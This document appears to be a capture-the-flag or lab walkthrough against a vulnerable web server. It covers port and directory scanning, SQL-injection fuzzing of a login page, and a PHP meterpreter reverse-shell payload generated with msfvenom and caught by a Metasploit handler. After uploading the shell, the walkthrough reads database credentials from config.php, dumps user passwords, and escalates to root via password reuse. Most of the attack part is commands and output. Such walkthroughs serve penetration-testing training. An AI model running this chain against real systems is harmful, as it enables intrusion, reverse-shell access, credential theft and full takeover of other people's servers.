Information gathering
Scan the host's services and service versions
nmap -sV <target IP address>
Quick scan of all host information
- nmap -T4 -A -v <target IP address>
Probe directory information
- nikto -host http://<target IP address>:<port>
- dirb http://<target IP address>:<port>
Exploiting weaknesses
- Is the login page vulnerable to SQL injection?
- Is sensitive information leaked?
Known vulnerabilities
- backup.zip, etc.
http://192.168.253.13/login.php
Bypassing the login authentication mechanism
View the login page source code; use Burp Suite to run fuzz tests and bypass the login verification mechanism.
Web fuzzing wordlist location: /usr/share/wordlists/wfuzz
Penetration testing tips
- Compare the differing return values in Burp Suite's Intruder module to tell the responses apart
- To bypass the authentication mechanism, inspect the source code and check whether there is JS (client-side) validation
root@kali:~# cd /usr/share/wordlists/wfuzz
root@kali:/usr/share/wordlists/wfuzz# ls
general  Injections  others  stress  vulns  webservices
root@kali:/usr/share/wordlists/wfuzz# cd Injections/
root@kali:/usr/share/wordlists/wfuzz/Injections# ls
All_attack.txt  bad_chars.txt  SQL.txt  Traversal.txt  XML.txt  xss.txt
root@kali:/usr/share/wordlists/wfuzz/Injections# cp SQL.txt /root/Desktop/SQL.txt
root@kali:/usr/share/wordlists/wfuzz/Injections# ls
All_attack.txt  bad_chars.txt  SQL.txt
root@kali:/usr/share/wordlists/wfuzz/Injections# cd /root/Desktop/
root@kali:~/Desktop# ls SQL.txt
http://192.168.1.9/personel.php
Generating a webshell
Start a Metasploit listener
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <attacker IP address>
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
Generate the shell
msfvenom -p php/meterpreter/reverse_tcp lhost=<attacker IP address> lport=4444 -f raw > /root/Desktop/shell.php
http://192.168.1.9/uploads/
meterpreter > ls
meterpreter > cd …
meterpreter > ls -al
Listing: /var/www/html
100644/rw-r--r--  356   fil  2017-03-20 18:17:54 +0800  config.php
100644/rw-r--r--  856   fil  2017-04-28 21:11:06 +0800  gonder.php
100644/rw-r--r--  9311  fil  2017-04-28 21:12:24 +0800  hakkimizda.php
100644/rw-r--r--  796   fil  2017-03-23 18:33:05 +0800  index.php
100644/rw-r--r--  4561  fil  2017-04-28 21:16:59 +0800  login.php
100644/rw-r--r--  3517  fil  2017-05-03 23:54:37 +0800  personel.php
100644/rw-r--r--  2143  fil  2017-04-28 21:14:40 +0800  sorgu.php
40777/rwxrwxrwx   4096  dir  2020-04-24 18:12:02 +0800  uploads
meterpreter > cat config.php
<?php
/////////////////////////////////////////////////////////////////////////////////////////
$con=mysqli_connect("localhost","root","toor","deneme");
if (mysqli_connect_errno())
{
echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();
}
/////////////////////////////////////////////////////////////////////////////////////////
?>
meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/var/www/html$ mysql -u root -p
Enter password: toor
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
mysql> use deneme;
mysql> show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user             |
+------------------+
mysql> select * from user;
+----+-------------+-------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad    | Kullanici_Adi     | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+-------------------+-----------+---------+-------------+---------+-------------+--------------+
| 1  | ismail kaya | [email protected] | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   | 5            |
| 2  | can demir   | [email protected] | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  | 8            |
+----+-------------+-------------------+-----------+---------+-------------+---------+-------------+--------------+
2 rows in set (0.00 sec)
mysql> quit;
[email protected]:/var/www/html$ su - root
Password: asd123***
[email protected]:~# whoami
root